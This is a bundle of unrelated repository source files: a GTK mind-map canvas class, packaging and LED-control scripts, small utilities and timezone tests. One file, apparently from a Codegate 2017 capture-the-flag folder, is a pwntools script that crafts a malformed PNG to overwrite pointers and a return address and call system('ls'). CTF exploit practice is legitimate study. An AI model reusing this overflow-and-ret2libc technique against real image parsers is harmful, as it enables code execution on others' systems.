def unselect_all (self):
self.hookup_im_context ()
for t in self.selected:
t.unselect ()
self.selected = []
def select_link (self, link, modifiers):
if modifiers and modifiers & Gdk.ModifierType.SHIFT_MASK and len (self.selected) > 1 and self.selected.count (link) > 0:
self.selected.remove (link)
link.unselect ()
return
self.hookup_im_context()
self.set_focus(None, None)
if modifiers and (modifiers & Gdk.ModifierType.SHIFT_MASK or modifiers == -1):
if self.selected.count (link) == 0:
self.selected.append (link)
else:
map (lambda t : t.unselect(), self.selected)
self.selected = [link]
link.select()
self.emit("change_buffer", None)
def set_focus(self, thought, modifiers):
if self.focus == thought:
return
if self.focus:
self.focus.leave()
if thought:
self.select_thought(thought, modifiers)
self.focus = thought
def select_thought (self, thought, modifiers):
self.hookup_im_context ()
if thought in self.selected and self.moving:
return
if thought not in self.thoughts:
self.thoughts.append(thought)
if modifiers and (modifiers & Gdk.ModifierType.SHIFT_MASK or modifiers == -1):
if self.selected.count (thought) == 0:
self.selected.append (thought)
else:
map(lambda x : x.unselect(), self.selected)
self.selected = [thought]
if thought.can_be_parent():
self.current_root = []
for x in self.selected:
if x.can_be_parent():
self.current_root.append(x)
thought.select ()
if len(self.selected) == 1:
self.emit ("thought_selection_changed", thought.background_color, thought.foreground_color)
self.background_color = thought.background_color
self.foreground_color = thought.foreground_color
try:
self.emit ("change_buffer", thought.extended_buffer)
except AttributeError:
self.emit ("change_buffer", None)
self.hookup_im_context (thought)
else:
self.emit ("change_buffer", None)
def undo_link_action (self, action, mode):
self.undo.block ()
self.set_focus(None, None)
link = action.args[0]
if action.undo_type == UNDO_CREATE_LINK:
if mode == UndoManager.REDO:
self.element.appendChild (link.element)
self.links.append (link)
else:
self.delete_link (link)
elif action.undo_type == UNDO_DELETE_LINK:
if mode == UndoManager.UNDO:
self.element.appendChild (link.element)
self.links.append (link)
else:
self.delete_link (link)
elif action.undo_type == UNDO_STRENGTHEN_LINK:
if mode == UndoManager.UNDO:
link.set_strength (action.args[1])
else:
link.set_strength (action.args[2])
self.undo.unblock ()
self.invalidate ()
def connect_link (self, link):
link.connect ("select_link", self.select_link)
link.connect ("update_view", self.update_view)
def create_link (self, thought, thought_coords, child, child_coords = None, strength = 2):
for x in self.links:
if x.connects (thought, child):
if x.change_strength (thought, child):
self.delete_link (x)
return
link = Link (self.save, parent = thought, child = child, strength = strength)
self.connect_link (link)
element = link.get_save_element ()
self.element.appendChild (element)
self.links.append (link)
return link
def set_mouse_cursor_cb (self, thought, cursor_type):
if not self.moving:
self.set_cursor (cursor_type)
def update_all_links(self):
map(lambda l : l.find_ends(), self.links)
def update_links_cb (self, thought):
for x in self.links:
if x.uses (thought):
x.find_ends ()
def update_view (self, thought):
self.invalidate ()
def invalidate (self, transformed_area = None):
        '''Invalidate the whole canvas, or just the given transformed area, forcing a redraw'''
rect = None
if not transformed_area:
alloc = self.get_allocation ()
rect = (0, 0, alloc.width, alloc.height)
else:
ul = self.untransform_coords(transformed_area[0], transformed_area[1])
lr = self.untransform_coords(transformed_area[2], transformed_area[3])
rect = (int(ul[0]), int(ul[1]), int(lr[0]-ul[0]), int(lr[1]-ul[1]))
if self.window:
self.window.invalidate_rect (rect, True)
def expose (self, widget, event):
'''Expose event. Calls the draw function'''
context = self.window.cairo_create ()
self.draw (event, context)
return False
def draw (self, event, context):
'''Draw the map and all the associated thoughts'''
area = event.area
context.rectangle (area.x, area.y, area.width, area.height)
context.clip ()
context.set_source_rgb (1.0,1.0,1.0)
context.move_to (area.x, area.y)
context.paint ()
context.set_source_rgb (0.0,0.0,0.0)
alloc = self.get_allocation ()
context.translate(alloc.width/2., alloc.height/2.)
context.scale(self.scale_fac, self.scale_fac)
context.translate(-alloc.width/2., -alloc.height/2.)
context.translate(self.translation[0], self.translation[1])
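        # the translate/scale/translate sequence above zooms about the window
        # centre; this final translate then applies the current pan offset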
for l in self.links:
l.draw (context)
self.untransform = context.get_matrix()
self.transform = context.get_matrix()
self.transform.invert()
ax, ay = self.transform_coords(area.x, area.y)
width = area.width / self.scale_fac
height = area.height / self.scale_fac
for t in self.thoughts:
try:
if t.lr[0] >= ax and t.ul[0] <= ax + width and t.lr[1] >= ay and t.ul[1] <= ay + height:
t.draw (context)
except:
t.draw(context)
if self.is_bbox_selecting:
xs = self.bbox_origin[0]
ys = self.bbox_origin[1]
xe = self.bbox_current[0] - xs
ye = self.bbox_current[1] - ys
xs,ys = context.user_to_device(xs, ys)
xe,ye = context.user_to_device_distance(xe, ye)
xs = int(xs) + 0.5
ys = int(ys) + 0.5
xe = int(xe)
ye = int(ye)
xs,ys = context.device_to_user(xs, ys)
xe,ye = context.device_to_user_distance(xe, ye)
color = utils.selected_colors["border"]
context.set_line_width(2.0)
context.set_source_rgb(color[0], color[1], color[2])
context.rectangle(xs, ys, xe, ye)
context.stroke()
#color = utils.selected_colors["fill"]
#context.set_source_rgba(color[0], color[1], color[2], 0.3)
#context.rectangle(xs, ys, xe, ye)
#context.fill()
#context.set_line_width(2.0)
#context.set_source_rgba(0.0, 0.0, 0.0, 1.0)
def undo_create_cb (self, action, mode):
self.undo.block ()
if mode == UndoManager.UNDO:
self.unselect_all ()
for t in action.args[1]:
self.select_thought (t, -1)
self.delete_thought (action.args[0])
self.emit ("change_mode", action.args[3])
else:
self.emit ("change_mode", action.args[2])
thought = action.args[0]
self.thoughts.append (thought)
for t in action.args[1]:
self.unselect_all ()
self.select_thought (t, -1)
self.hookup_im_context (thought)
self.emit ("change_buffer", thought.extended_buffer)
self.element.appendChild (thought.element)
for l in action.args[5:]:
self.links.append (l)
self.element.appendChild (l.element)
self.emit ("set_focus", None, False)
self.undo.unblock ()
self.invalidate ()
def create_new_thought (self, coords, type = None, loading = False):
self.set_focus(None, None)
if not type:
type = self.mode
if type == MODE_TEXT:
# fixed<-_vbox<-_sw<-_main_area
thought = TextThought.TextThought (coords, self.pango_context, self.nthoughts, self.save, self.undo, loading, self.background_color, self.foreground_color, fixed=self.parent.parent.parent.parent, parent=self)
elif type == MODE_LABEL:
thought = LabelThought.LabelThought (coords, self.pango_context, self.nthoughts, self.save, self.undo, loading, self.background_color, self.foreground_color)
elif type == MODE_IMAGE:
thought = ImageThought.ImageThought (coords, self.pango_context, self.nthoughts, self.save, self.undo, loading, self.background_color, self.foreground_color)
elif type == MODE_DRAW:
thought = DrawingThought.DrawingThought (coords, self.pango_context, self.nthoughts, self.save, self.undo, \
loading,self.background_color, self.foreground_color)
elif type == MODE_RESOURCE:
thought = ResourceThought.ResourceThought (coords, self.pango_context, self.nthoughts, self.save, self.undo, loading, self.background_color, self.foreground_color)
if not thought.okay ():
return None
if type == MODE_IMAGE:
self.emit ("change_mode", self.old_mode)
self.nthoughts += 1
element = thought.element
self.element.appendChild (thought.element)
thought.connect ("select_thought", self.select_thought)
thought.connect ("create_link", self.create_link)
thought.connect ("update_view", self.update_view)
thought.connect ("text_selection_changed", self.text_selection_cb)
thought.connect ("change_mouse_cursor", self.set_mouse_cursor_cb)
thought.connect ("update_links", self.update_links_cb)
thought.connect ("grab_focus", self.regain_focus_cb)
thought.connect ("update-attrs", self.update_attr_cb)
self.thoughts.append (thought)
return thought
def regain_focus_cb (self, thought, ext):
self.emit ("set_focus", None, ext)
def update_attr_cb (self, widget, bold, italics, underline, pango_font):
self.emit ("set_attrs", bold, italics, underline, pango_font)
def delete_thought (self, thought, undo = True):
if undo:
action = UndoManager.UndoAction (self, UNDO_DELETE_SINGLE, self.undo_deletion, [thought])
else:
action = None
if hasattr(thought, 'textview'):
thought.remove_textview()
if thought.element in self.element.childNodes:
self.element.removeChild (thought.element)
self.thoughts.remove (thought)
try:
self.selected.remove (thought)
        except ValueError:
pass
if self.focus == thought:
self.hookup_im_context ()
self.focus = None
if self.primary == thought:
thought.disconnect (self.title_change_handler)
self.title_change_handler = None
self.primary = None
if self.thoughts:
self.make_primary (self.thoughts[0])
rem_links = []
for l in self.links:
if l.uses (thought):
if action: action.add_arg (l)
rem_links.append (l)
for l in rem_links:
self.delete_link (l)
for i, obj in enumerate(self.current_root):
if obj == thought:
del self.current_root[i]
break
if action:
self.undo.add_undo (action)
return True
def undo_deletion (self, action, mode):
self.undo.block ()
if mode == UndoManager.UNDO:
self.unselect_all ()
for l in action.args[1:]:
self.links.append (l)
self.element.appendChild (l.element)
for t in action.args[0]:
self.thoughts.append (t)
self.select_thought (t, -1)
self.element.appendChild (t.element)
if t.am_primary and not self.primary:
self.emit ("change_buffer", action.args[0][0].extended_buffer)
self.make_primary(t)
else:
for t in action.args[0]:
self.delete_thought (t, False)
for l in action.args[1:]:
self.delete_link (l)
self.emit ("set_focus", None, False)
self.undo.unblock ()
self.invalidate ()
def delete_selected_elements (self):
if len(self.selected) == 0:
return
action = UndoManager.UndoAction (self, UNDO_DELETE, self.undo_deletion, copy.copy(self.selected))
try:
            # delete_thought as a callback adds its own undo action. Block that here
self.undo.block ()
tmp = self.selected
t = tmp.pop()
while t:
if t in self.thoughts:
for l in self.links:
if l.uses (t):
action.add_arg (l)
self.delete_thought (t)
if t in self.links:
self.delete_link (t)
if len (tmp) == 0:
t = None
else:
t = tmp.pop()
finally:
self.undo.unblock ()
self.undo.add_undo (action)
self.invalidate ()
def delete_link (self, link):
if link.element in self.element.childNodes:
self.element.removeChild (link.element)
#link.element.unlink ()
try:
self.links.remove (link)
        except ValueError:
pass
def find_related_thought (self, radians):
# Find thought within angle
best = None
bestangle = 1000.
bestdist = 10000.
def do_find (one, two, currentangle, curdist, sensitivity):
init_x = (one.ul[0] + one.lr[0]) / 2.
init_y = (one.ul[1] + one.lr[1]) / 2.
other_x = (two.ul[0] + two.lr[0]) / 2.
other_y = (two.ul[1] + two.lr[1]) / 2.
angle = math.atan2 ((other_y - init_y), (other_x - init_x))
while angle > math.pi:
angle -= math.pi
while angle < -math.pi:
angle += math.pi
            # We have to special-case left because atan2 wraps at +/-pi;
            # we shift both angles by pi radians before comparing them
if radians == RAD_LEFT:
relangle = abs((angle+math.pi) - (radians+math.pi))
if relangle > math.pi*2.:
relangle -= math.pi*2.
else:
relangle = abs(angle - radians)
newdist = math.sqrt ((init_x - other_x)**2 + (init_y - other_y)**2)
magicnum = newdist + (50. * relangle)
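            # score candidates by distance plus a penalty of 50 units per
            # radian of angular deviation; the smallest score wins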
# Used for debugging. Spits out lots of useful info
# to determine interesting things about the thought relations
#print "angle: "+str(angle)+" rel: "+str(magicnum)+" rads: "+str(radians),
#print " , "+str(math.pi / 3.0)+" , "+str(currentangle)+"\n: "+str(relangle)
if (relangle < sensitivity) and \
(magicnum < currentangle):
return (magicnum, newdist)
return (currentangle, curdist)
if len(self.selected) != 1:
return None
initial = self.selected[0]
for x in self.links:
if x.parent == initial:
other = x.get_child()
elif x.get_child() == initial:
other = x.parent
else:
continue
(curr, dist) = do_find (initial, other, bestangle, bestdist, math.pi/3.)
if curr < bestangle:
bestangle = curr
best = other
bestdist = dist
if not best:
for x in self.thoughts:
if x == self.selected[0]:
continue
(curr, dist) = do_find (initial, x, bestangle, bestdist, math.pi/4.)
if curr < bestangle:
best = x
bestangle = curr
bestdist = dist
return best
def undo_align(self, action, mode):
self.undo.block ()
dic = action.args[0]
if mode == UndoManager.UNDO:
for t in dic:
t.move_by(-dic[t][0], -dic[t][1])
else:
for t in dic:
t.move_by(dic[t][0], dic[t][1])
self.undo.unblock ()
def align_top_left(self, vertical=True):
dic = {}
if len(self.selected) != 0:
x = self.selected[0].ul[0]
y = self.selected[0].ul[1]
for t in self.selected:
if vertical:
vec = (-(t.ul[0]-x), 0)
else:
vec = (0, -(t.ul[1]-y))
t.move_by(vec[0], vec[1])
dic[t] = vec
self.undo.add_undo (UndoManager.UndoAction (self, UNDO_ALIGN, self.undo_align, dic))
def align_bottom_right(self, vertical=True):
dic = {}
if len(self.selected) != 0:
x = self.selected[0].lr[0]
y = self.selected[0].lr[1]
for t in self.selected:
if vertical:
vec = (-(t.lr[0]-x), 0)
else:
vec = (0, -(t.lr[1]-y))
t.move_by(vec[0], vec[1])
dic[t] = vec
self.undo.add_undo (UndoManager.UndoAction (self, UNDO_ALIGN, self.undo_align, dic))
def align_centered(self, vertical=True):
dic = {}
if len(self.selected) != 0:
x = self.selected[0].ul[0] + (self.selected[0].lr[0] - self.selected[0].ul[0]) / 2.0
y = self.selected[0].ul[1] + (self.selected[0].lr[1] - self.selected[0].ul[1]) / 2.0
for t in self.selected:
if vertical:
vec = (-((t.ul[0] + (t.lr[0]-t.ul[0])/2.0)-x), 0)
else:
vec = (0, -((t.ul[1] + (t.lr[1]-t.ul[1])/2.0)-y))
t.move_by(vec[0], vec[1])
dic[t] = vec
self.undo.add_undo (UndoManager.UndoAction (self, UNDO_ALIGN, self.undo_align, dic))
def global_key_handler (self, event):
thought = None
if event.keyval == Gdk.KEY_Up:
thought = self.find_related_thought (RAD_UP)
elif event.keyval == Gdk.KEY_Down:
thought = self.find_related_thought (RAD_DOWN)
elif event.keyval == Gdk.KEY_Left:
thought = self.find_related_thought (RAD_LEFT)
elif event.keyval == Gdk.KEY_Right:
thought = self.find_related_thought (RAD_RIGHT)
elif event.keyval == Gdk.KEY_Delete:
self.delete_selected_elements ()
elif event.keyval == Gdk.KEY_BackSpace:
self.delete_selected_elements ()
elif event.keyval == Gdk.KEY_Return:
if self.focus:
self.focus.enter()
elif event.keyval == Gdk.KEY_Escape:
if self.focus and self.focus.creating:
self.undo.forget_action()
self.unselect_all ()
self.focus = None
elif event.keyval == Gdk.KEY_a and event.get_state() & Gdk.ModifierType.CONTROL_MASK:
self.unselect_all ()
for t in self.thoughts:
t.select ()
self.selected.append (t)
else:
return False
if thought:
self.set_focus(thought, None)
self.invalidate ()
return True
def load_thought (self, node, type, tar):
thought = self.create_new_thought (None, type, loading = True)
thought.creating = False
thought.load (node, tar)
def load_link (self, node):
link = Link (self.save)
self.connect_link (link)
link.load (node)
self.links.append (link)
element = link.get_save_element ()
self.element.appendChild (element)
def load_thyself (self, top_element, doc, tar):
for node in top_element.childNodes:
if node.nodeName == "thought":
self.load_thought (node, MODE_TEXT, tar)
elif node.nodeName == "label_thought":
self.load_thought (node, MODE_LABEL, tar)
elif node.nodeName == "image_thought":
self.load_thought (node, MODE_IMAGE, tar)
elif node.nodeName == "drawing_thought":
self.load_thought (node, MODE_DRAW, tar)
elif node.nodeName == "res_thought":
self.load_thought (node, MODE_RESOURCE, tar)
elif node.nodeName == "link":
self.load_link (node)
else:
print "Warning: Unknown element type. Ignoring: "+node.nodeName
self.finish_loading ()
def finish_loading (self):
        # Possible TODO: This all assumes we've been given a proper,
        # consistent file. It should fall back nicely, but...
# First, find the primary root:
for t in self.thoughts:
if t.am_primary:
self.make_primary (t)
if t.am_selected:
self.selected.append (t)
t.select ()
if t.identity >= self.nthoughts:
self.nthoughts = t.identity + 1
if self.selected:
self.current_root = self.selected
else:
self.current_root = [self.primary]
if len(self.selected) == 1:
self.emit ("change_buffer", self.selected[0].extended_buffer)
self.hookup_im_context (self.selected[0])
self.emit ("thought_selection_changed", self.selected[0].background_color, \
self.selected[0].foreground_color)
else:
self.emit ("change_buffer", None)
del_links = []
for l in self.links:
if (l.parent_number == -1 and l.child_number == -1) or \
(l.parent_number == l.child_number):
del_links.append (l)
continue
parent = child = None
for t in self.thoughts:
if t.identity == l.parent_number:
parent = t
elif t.identity == l.child_number:
child = t
if parent and child:
break
l.set_parent_child (parent, child)
if not l.parent or not l.get_child():
del_links.append (l)
for l in del_links:
self.delete_link (l)
def update_save(self):
for t in self.thoughts:
t.update_save ()
for l in self.links:
l.update_save ()
def save_thyself(self, tar):
for t in self.thoughts:
t.save(tar)
def text_selection_cb (self, thought, start, end, text):
self.emit ("text_selection_changed", start, end, text)
def copy_clipboard (self, clip):
if len (self.selected) != 1:
return
self.selected[0].copy_text (clip)
def cut_clipboard (self, clip):
if len (self.selected) != 1:
return
self.selected[0].cut_text (clip)
def paste_clipboard (self, clip):
if len (self.selected) != 1:
return
self.selected[0].paste_text (clip)
def export (self, context, width, height, native):
context.rectangle (0, 0, width, height)
context.clip ()
context.set_source_rgb (1.0,1.0,1.0)
context.move_to (0,0)
context.paint ()
context.set_source_rgb (0.0,0.0,0.0)
if not native:
move_x = self.move_x
move_y = self.move_y
else:
move_x = 0
move_y = 0
for l in self.links:
l.export (context, move_x, move_y)
for t in self.thoughts:
t.export (context, move_x, move_y)
def get_max_area (self):
        minx = miny = float('inf')
        maxx = maxy = float('-inf')
for t in self.thoughts:
mx,my,mmx,mmy = t.get_max_area ()
if mx < minx:
minx = mx
if my < miny:
miny = my
if mmx > maxx:
maxx = mmx
if mmy > maxy:
maxy = mmy
# Add a 10px border around all
self.move_x = 10-minx
self.move_y = 10-miny
maxx = maxx-minx+20
maxy = maxy-miny+20
return (maxx,maxy)
def get_selection_bounds (self):
if len (self.selected) == 1:
try:
return self.selected[0].index, self.selected[0].end_index
except AttributeError:
return None, None
else:
return None, None
def thoughts_are_linked (self):
if len (self.selected) != 2:
return False
for l in self.links:
if l.connects (self.selected[0], self.selected[1]):
return True
return False
def drag_menu_cb(self, sw, mode):
if len(self.selected) == 1:
if hasattr(self.selected[0], 'textview'):
self.selected[0].remove_textview()
        if mode:
self.sw = sw
self.drag_mode = True
else:
self.drag_mode = False
def is_dragging(self):
return self.drag_mode
def _adjust_sw(self, dx, dy):
if self.sw is None:
return
if not self.drag_mode:
return
hadj = self.sw.get_hadjustment()
hvalue = hadj.get_value() + dx
try:
if hvalue < hadj.get_lower():
hvalue = hadj.get_lower()
elif hvalue > hadj.get_upper():
hvalue = hadj.get_upper()
except AttributeError:
pass
hadj.set_value(hvalue)
self.sw.set_hadjustment(hadj)
vadj = self.sw.get_vadjustment()
vvalue = vadj.get_value() + dy
try:
if vvalue < vadj.get_lower():
vvalue = vadj.get_lower()
elif vvalue > vadj.get_upper():
vvalue = vadj.get_upper()
except AttributeError:
pass
vadj.set_value(vvalue)
self.sw.set_vadjustment(vadj)
def stop_moving(self):
self.moving = False
self.move_mode = False
self.move_origin = None
def start_moving(self, move_button):
if len(self.selected) == 1:
if hasattr(self.selected[0], 'textview'):
self.selected[0].remove_textview()
self.move_mode = True
self.move_button = move_button
def link_menu_cb (self):
if len (self.selected) != 2:
return
if not self.selected[0].can_be_parent() or \
not self.selected[1].can_be_parent():
return
lnk = None
for l in self.links:
if l.connects (self.selected[0], self.selected[1]):
lnk = l
break
if lnk:
self.undo.add_undo (UndoManager.UndoAction (self, UNDO_DELETE_LINK, self.undo_link_action, lnk))
self.delete_link (lnk)
else:
lnk = self.create_link (self.selected[0], None, self.selected[1])
self.undo.add_undo (UndoManager.UndoAction (self, UNDO_CREATE_LINK, self.undo_link_action, lnk))
self.invalidate ()
def set_bold (self, active):
if len(self.selected) != 1:
return
self.selected[0].set_bold (active)
self.invalidate()
def set_italics (self, active):
if len(self.selected) != 1:
return
self.selected[0].set_italics (active)
self.invalidate()
def set_underline (self, active):
if len(self.selected) != 1:
return
self.selected[0].set_underline (active)
self.invalidate()
def set_background_color(self, color):
for s in self.selected:
s.background_color = color
self.background_color = color
if len(self.selected) > 1:
self.invalidate()
def set_foreground_color(self, color):
for s in self.selected:
s.foreground_color = color
self.foreground_color = color
if len(self.selected) > 1:
self.invalidate()
def set_font(self, font_name, font_size):
if len (self.selected) == 1 and hasattr(self.selected[0], "set_font"):
self.selected[0].set_font(font_name, font_size)
self.font_name = font_name
self.font_size = font_size
self.invalidate()
def embody_thought(self, event):
coords = self.transform_coords (event.get_coords()[0], event.get_coords()[1])
thought = self.create_new_thought(coords)
sel = self.selected
if not thought:
return True
if not self.primary and \
thought.can_be_parent():
self.make_primary (thought)
self.select_thought (thought, None)
else:
self.emit ("change_buffer", thought.extended_buffer)
self.hookup_im_context (thought)
# Creating links adds an undo action. Block it here
self.undo.block ()
if not self.current_root:
self.current_root.append(self.primary)
if thought.can_be_parent():
for x in self.current_root:
if x.can_be_parent():
self.create_link (x, None, thought)
for x in self.selected:
x.unselect ()
self.selected = [thought]
thought.select ()
self.undo.unblock ()
thought.foreground_color = self.foreground_color
thought.background_color = self.background_color
act = UndoManager.UndoAction (self, UNDO_CREATE, self.undo_create_cb, thought, sel, \
self.mode, self.old_mode, event.get_coords())
for l in self.links:
if l.uses (thought):
act.add_arg (l)
"""
if self.undo.peak ().undo_type == UNDO_DELETE_SINGLE:
last_action = self.undo.pop ()
action = UndoManager.UndoAction (self, UNDO_COMBINE_DELETE_NEW, self.undo_joint_cb, \
last_action, act)
self.undo.add_undo (action)
else:
"""
self.undo.add_undo (act)
thought.enter()
thought.includes(coords)
event.button = 1
thought.process_button_down(event, coords)
self.focus = thought
class CursorFactory:
__shared_state = {"cursors": {}}
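    # Borg pattern: every instance shares this state, so each cursor is
    # created once and cached for the whole process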
def __init__(self):
self.__dict__ = self.__shared_state
def get_cursor(self, cur_type):
        if cur_type not in self.cursors:
cur = Gdk.Cursor.new(cur_type)
self.cursors[cur_type] = cur
return self.cursors[cur_type]
|
Boquete/activity-labyrinth
|
src/MMapArea.py
|
Python
|
gpl-2.0
| 43,202
|
from distutils.core import setup
setup(
name='CoPing',
version='0.1.4',
packages=['CoPing'],
url='https://github.com/joedborg/PyPing',
scripts=['CoPing/coping'],
license='GPLv2',
author='Joe Borg',
author_email='mail@jdborg.com',
description='A Cisco style ping tool'
)
|
joedborg/CoPing
|
setup.py
|
Python
|
gpl-2.0
| 307
|
import binascii
import os
from pwn import *
def crc32(val):
return binascii.crc32(val) & 0xffffffff
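# PNG chunk CRCs cover the chunk type plus the chunk data (not the length
# field), and the mask keeps the value an unsigned 32-bit integer on Python 2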
PNG_HEADER = '\x89\x50\x4e\x47\x0d\x0a\x1a\x0a'
payload = ''
# state 11
payload += PNG_HEADER
'''
IHDR Chunk
'''
# state 12
HEADER = 'IHDR'
data_len = 13
payload += p32(data_len)[::-1] + HEADER
# state 13
data = p32(1)[::-1] + p32(1)[::-1] + p8(8) + p8(0) + p8(0) + p8(0) + p8(0)
payload += data
# state 14
payload += p32(crc32(HEADER+data))[::-1]
'''
IDAT Chunk
'''
# state 12
HEADER = 'IDAT'
data_len = 0x10000 - len(payload) - 12
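# size this IDAT so the payload reaches exactly 0x10000 bytes once the chunk
# is appended (12 = 4-byte length + 4-byte type + 4-byte CRC of overhead)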
payload += p32(data_len)[::-1] + HEADER
# state 13
data = cyclic(data_len)
payload += data
# state 14
payload += p32(crc32(HEADER+data))[::-1]
'''
IDAT Chunk
'''
# state 12
HEADER = 'IDAT'
data_len = 0x10000 - 12
payload += p32(data_len)[::-1] + HEADER
# state 13
cycle = cyclic(data_len)
offset1 = cycle.index(p32(0x62616163))
offset2 = cycle.index(p32(0x62616162))
print offset1, offset2
ret_offset = 0x90
LOCAL = True
LIBC_BASE = 0xf7575000
SYSTEM_ADDR = 0x8048540
if LOCAL:
STDIN_ADDR = LIBC_BASE+(0xf7fa45a0-0xf7df2000)
LS_ADDR = LIBC_BASE + 0x10ed2
else:
STDIN_ADDR = 0xf77185a0
LS_ADDR = STDIN_ADDR + 0x55214
data = 'ls'.rjust(data_len, ' ')
data = data[:offset1]+p32(STDIN_ADDR)+data[offset1+4:] # feof
data = data[:offset2]+p32(0x00)+data[offset2+4:] # free
data = data[:ret_offset]+p32(SYSTEM_ADDR)+'aaaa'+p32(LS_ADDR)+data[ret_offset+12:] # ret
payload += data
# state 14
payload += p32(crc32(HEADER+data))[::-1]
'''
Broken Chunk
'''
# state 12
payload += 'die'
f = open('payload.png', 'wb')
f.write(payload)
f.close()
os.system('ltrace ./pngparser payload.png')
|
Qwaz/solved-hacking-problem
|
Codegate/2017 Quals/pngparser (unsolved)/generator.py
|
Python
|
gpl-2.0
| 1,654
|
import socket
import convox_led_pb2 as ledbuf
from time import sleep
from random import randint
UDP_IP = "192.168.1.124"
UDP_PORT = 666
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
class LightFrame:
    def __init__(self, colors=((255, 255, 255),), period=200000, transition_steps=200000, circle_compression=1):
self._lights = ledbuf.ConvoxLightConfig()
self._lights.period = period
self._lights.transition_steps = transition_steps
self._lights.circle_compression = circle_compression
self.set_colors(colors)
def add_color(self, coords, rgb=True):
self._lights.colors.add()
self._lights.colors[-1].color_space = int(rgb)
[self._lights.colors[-1].coordinates.append(i) for i in coords]
def set_colors(self, colors, rgb=True):
[self.add_color(coords, rgb=rgb) for coords in colors]
def __str__(self):
return self._lights.SerializeToString()
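# Example (hypothetical values): str(LightFrame([(255, 0, 0)] * 9)) yields the
# serialised ConvoxLightConfig protobuf for nine red LEDs, ready for sendto()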
class Controller:
default_colors = [(0, 255, 0) for _ in range(9)]
def __init__(self, mode):
self.lights = LightFrame(self.default_colors)
self.sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
if mode == 'disco':
for _ in range(1000):
colors = [(randint(0, 255), randint(0, 255), randint(0, 255)) for _ in range(9)]
self.send_frame(colors)
sleep(0.3)
else:
self.send_frame(self.default_colors)
def send_frame(self, colors):
self.lights = LightFrame(colors)
self.sock.sendto(str(self.lights), (UDP_IP, UDP_PORT))
if __name__ == '__main__':
c = Controller('disco')
|
cmcneil/convox-led
|
proto/client.py
|
Python
|
gpl-2.0
| 1,664
|
"""
Program to reverse a string and print it out
"""
def reverseString(string):
    revString = []
    i = len(string) - 1
    while i >= 0:
        revString.append(string[i])
        i -= 1
    newString = ""
    for i in range(len(revString)):
        newString = newString + str(revString[i])
    print "The reverse string is: %s" % newString
if __name__=="__main__":
print "Enter the string that you need to reverse:"
string = raw_input()
reverseString(string)
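# Note: an idiomatic one-liner for this is string[::-1]; the explicit loop
# above is kept for practice purposes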
|
nbhavana/python-practice-programs
|
reverseString.py
|
Python
|
gpl-2.0
| 543
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# when fed a properly formatted csv file of SAP inventory, splits it into separate per-category CSV files
import csv, sys
from pprint import *
arguments = sys.argv[1:]
if arguments == []:
print("This script must be passed arguments in order to function.")
sys.exit(1)
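# NOTE: only the last argument survives the loop below, so a single file is
# processed per run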
for x in arguments:
arg = str(x)
listofmodularparts = ['661-6357', '661-6856', '661-8041', '661-00020', '661-00021', '661-00022']
listofadapters = ['661-5843', '661-6365', '661-6403', '661-6536', '661-7015']
listofenvelopes = ['C661-4954', '661-6367']
modularRTW = []
adapterRTW = []
envelopeRTW = []
iPhoneRTW = []
iPodRTW = []
iPadRTW = []
with open(arg, 'r') as csvfile:
inventoryfromfile = csv.reader(csvfile)
inventory = []
deletionindex = []
for i in inventoryfromfile:
inventory.append(i)
# make list of modulars
for i, columns in enumerate(inventory):
if columns[0] in listofmodularparts:
modularRTW.append(columns[0:3])
deletionindex.append(i)
# make list of adapters
for i, columns in enumerate(inventory):
if columns[0] in listofadapters:
adapterRTW.append(columns[0:3])
deletionindex.append(i)
# make list of envelopes
for i, columns in enumerate(inventory):
if columns[0] in listofenvelopes:
envelopeRTW.append(columns[0:3])
deletionindex.append(i)
# make list of ipods
for i, columns in enumerate(inventory):
if "IPOD" in columns[2]:
iPodRTW.append(columns[0:3])
deletionindex.append(i)
# make list of iphones
for i, columns in enumerate(inventory):
if "IPHONE" in columns[2] and columns[0] not in listofmodularparts:
iPhoneRTW.append(columns[0:3])
deletionindex.append(i)
# make list of ipads
for i, columns in enumerate(inventory):
if "IPAD" in columns[2]:
iPadRTW.append(columns[0:3])
deletionindex.append(i)
deletionindex = list(set(deletionindex))
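    # delete from the highest index down so the earlier indices remain valid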
for i in reversed(deletionindex):
del inventory[i]
repairPartsInventory = inventory
def writeToFile(listname, filename):
with open(filename, 'w') as x:
writer = csv.writer(x)
writer.writerows(listname)
writeToFile(modularRTW,'Modular Parts List.csv')
writeToFile(adapterRTW,'Adapter RTW List.csv')
writeToFile(envelopeRTW, 'Envelope RTW list.csv')
writeToFile(iPhoneRTW,'iPhone RTW List.csv')
writeToFile(iPodRTW, 'iPod RTW List.csv')
writeToFile(iPadRTW, 'iPad RTW List.csv')
#for i in deletionindex:
|
chrishewlings/Projects
|
Python/Inventory Parser/sap_csv_parse.py
|
Python
|
gpl-2.0
| 2,378
|
# tests.utils_tests.timez_tests
# Tests for the timez utility package
#
# Author: Benjamin Bengfort <benjamin@bengfort.com>
# Created: Mon Nov 11 12:48:23 2013 -0500
#
# Copyright (C) 2013 Bengfort.com
# For license information, see LICENSE.txt
#
# ID: timez_tests.py [] benjamin@bengfort.com $
"""
Tests for the timez utility package
"""
##########################################################################
## Imports
##########################################################################
import unittest
from zerocycle.utils.timez import *
from dateutil.tz import tzlocal, tzutc
from datetime import datetime, timedelta
class TimezTest(unittest.TestCase):
def setUp(self):
self.localnow = datetime.now(tzlocal()).replace(microsecond=0)
self.utcnow = self.localnow.astimezone(tzutc())
def tearDown(self):
self.localnow = self.utcnow = None
def test_strptimez(self):
"""
Assert that strptimez returns a tz aware utc datetime
"""
dtfmt = "%a %b %d %H:%M:%S %Y %z"
dtstr = self.localnow.strftime(dtfmt)
self.assertEqual(strptimez(dtstr, dtfmt), self.utcnow)
def test_strptimez_no_z(self):
"""
Assert that strptimez works with no '%z'
This should return a timezone naive datetime
"""
dtfmt = "%a %b %d %H:%M:%S %Y"
dtstr = self.localnow.strftime(dtfmt)
self.assertEqual(strptimez(dtstr, dtfmt), self.localnow.replace(tzinfo=None))
def test_strptimez_no_space(self):
"""
Non-space delimited '%z' works
"""
dtfmt = "%Y-%m-%dT%H:%M:%S%z"
dtstr = self.localnow.strftime(dtfmt)
self.assertEqual(strptimez(dtstr, dtfmt), self.utcnow)
def test_begin_z(self):
"""
Test fmt that begins with '%z'
"""
dtfmt = "%z %H:%M:%S for %Y-%m-%d"
dtstr = self.localnow.strftime(dtfmt)
self.assertEqual(strptimez(dtstr, dtfmt), self.utcnow)
def test_middle_z(self):
"""
Test fmt that contains '%z'
"""
